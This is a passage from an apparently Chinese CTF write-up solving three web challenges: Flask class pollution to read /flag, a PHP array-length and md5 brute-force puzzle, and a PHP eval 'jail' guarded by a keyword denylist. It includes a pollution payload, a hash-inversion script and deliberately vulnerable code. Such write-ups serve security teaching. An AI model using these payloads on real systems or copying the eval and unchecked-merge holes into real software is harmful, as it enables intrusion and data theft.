    parsed and handed to ``merge`` as-is, so the client decides which
    attributes — dunder names included — get written. A malformed body makes
    ``json.loads`` raise (the unused ``is_json`` helper is not consulted).
    Mitigation: validate the body against a fixed schema and refuse any key
    beginning with ``__``.
    """
    if request.is_json:
        merge(json.loads(request.data),instance)
    else:
        return "J1ngHong说:钥匙圣洁无暇,无人可以污染!"
    return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?"

# Binds to every interface on port 80 with the Flask development server.
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80)

python 原型链污染:把 __file__ 污染为 /flag,之后 /read 读出的就是 flag。发送如下 POST 数据(JSON)

{"__init__":{"__globals__":{"__file__":"/flag"}}}

玩原神玩的

源码

<?php
  highlight_file(__FILE__);
error_reporting(0);

// $array is presumably defined by flag.php (not shown). Comparing its size
// with a client-supplied array leaks the flag's length: the response differs
// between equal and unequal sizes, so the length can be found by guessing.
include 'flag.php';
if (sizeof($_POST['len']) == sizeof($array)) {
  ys_open($_GET['tip']);
} else {
  die("错了!就你还想玩原神?❌❌❌");
}

// Gate on a fixed phrase (loose != comparison), then fall through to dumpFlag().
function ys_open($tip) {
  if ($tip != "我要玩原神") {
    die("我不管,我要玩原神!😭😭😭");
  }
  dumpFlag();
}

// Emits md5(ord(byte) ^ index) for every byte of $array. Each position has at
// most 256 candidate preimages, so this is a trivially reversible encoding of
// the flag rather than any kind of protection.
function dumpFlag() {
  if (!isset($_POST['m']) || sizeof($_POST['m']) != 2) {
    die("可恶的QQ人!😡😡😡");
  }
  $a = $_POST['m'][0];
  $b = $_POST['m'][1];
  // The expected values are spelled out in the source that highlight_file()
  // prints, so this only confirms the client has read the page.
  if(empty($a) || empty($b) || $a != "100%" || $b != "love100%" . md5($a)) {
    die("某站崩了?肯定是某忽悠干的!😡😡😡");
  }
  include 'flag.php';
  // Appends an empty array at index 0, which the loop overwrites as soon as
  // $array is non-empty; `$flag = [];` was probably intended.
  $flag[] = array();
  for ($ii = 0;$ii < sizeof($array);$ii++) {
    $flag[$ii] = md5(ord($array[$ii]) ^ $ii);
  }

  echo json_encode($flag);
}

len数组的长度要和array一样,爆破array的长度为45,源码给出了m数组的内容

最后得到flag的数组,每一位进行md5,直接爆破md5

php 的数组:len[]=0&len[]=1&len[]=2&len[]=3&len[]=4……(依此拼接到 45 个元素)

爆破md5

import hashlib

# The 45 per-position digests returned by dumpFlag(): md5(str(ord(c) ^ i)).
md5_array  = ["3295c76acbf4caaed33c36b1b5fc2cb1","26657d5ff9020d2abefe558796b99584","73278a4a86960eeb576a8fd4c9ec6997","ec8956637a99787bd197eacd77acce5e","e2c420d928d4bf8ce0ff2ec19b371514","43ec517d68b6edd3015b3edc9a11367b","ea5d2f1c4608232e07d3aa3d998e5135","c8ffe9a587b126f152ed3d89a146b445","072b030ba126b2f4b2374f342be9ed44","c9e1074f5b3f9fc8ea15d152add07294","093f65e080a295f8076b1c5722a46aa2","66f041e16a60928b05a7e228a89c3799","9f61408e3afb633e50cdf1b20de6f466","9a1158154dfa42caddbd0694a4e9bdc8","9f61408e3afb633e50cdf1b20de6f466","a684eceee76fc522773286a895bc8436","7f39f8317fbdb1988ef4c628eba02591","eb160de1de89d9058fcb0b968dbbbd68","c45147dee729311ef5b5c3003946c48f","7f6ffaa6bb0b408017b62254211691b5","07e1cd7dca89a1678042477183b7ac3f","9f61408e3afb633e50cdf1b20de6f466","e369853df766fa44e1ed0ff613f563bd","5ef059938ba799aaa845e1c2e8a762bd","a1d0c6e83f027327d8461063f4ac58a6","a1d0c6e83f027327d8461063f4ac58a6","b53b3a3d6ab90ce0268229151c9bde11","a0a080f42e6f13b3a2df133f073095dd","17e62166fc8586dfa4d1bc0e1742c08b","3416a75f4cea9109507cacd8e2f2aefc","a5771bce93e200c36f7cd9dfd0e5deaa","c0c7c76d30bd3dcaefc96f40275bdc0a","a3f390d88e4c41f2747bfa2f1b5f87db","6f4922f45568161a8cdf4ad2299f6d23","98f13708210194c475687be6106a3b84","37693cfc748049e45d87b8c7d8b9aacd","7cbbc409ec990f19c78c75bd1e06f215","1f0e3dad99908345f7439f8ffabdffc4","34173cb38f07f89ddbebc2ac9128303f","70efdf2ec9b086079795c442636b55fb","35f4a8d465e6e1edc05f3d8ab658c551","02e74f10e0327ad868d138f2b4fdd6f0","d1fe173d08e959397adf34b1d77e88d7","1f0e3dad99908345f7439f8ffabdffc4","43ec517d68b6edd3015b3edc9a11367b"]

flag = ''

# Invert each digest by trying all 256 byte values. PHP's md5() of an int
# hashes its decimal string form, hence str(j ^ index). A position with no
# match is silently skipped, which would shift every later character left.
for index, i in enumerate(md5_array):
    for j in range(256):
        if hashlib.md5(str(j ^ index).encode()).hexdigest() == i:
            flag += chr(j)

print(flag)

ez_php_jail

源码

<?php
highlight_file(__FILE__);
error_reporting(0);
include("hint.html");
// NOTE(review): PHP rewrites '.' in incoming parameter names to '_', so a
// literal ?Jail_by.Happy= query does not populate this key — confirm how the
// parameter is meant to be supplied.
$Jail = $_GET['Jail_by.Happy'];

// Loose comparison: an unset parameter and an empty string both equal null here.
if($Jail == null) die("Do You Like My Jail?");

// Case-insensitive denylist of characters and keywords, applied to text that
// is about to be eval()'d. A denylist cannot make eval() of request data
// safe; the only real fix is to remove the eval().
function Like_Jail($var) {
    if (preg_match('/(`|\$|a|c|s|require|include)/i', $var)) {
        return false;
    }
    return true;
}

// Sink: whatever passes the denylist is executed as PHP.
if (Like_Jail($Jail)) {
    eval($Jail);
    echo "Yes! you escaped from the jail! LOL!";
} else {
    echo "You will Jail in your life!";
}
echo "\n";

// Output the PHP source after the HTML has been parsed

?>

执行 highlight_file,并利用 glob 进行通配符查找

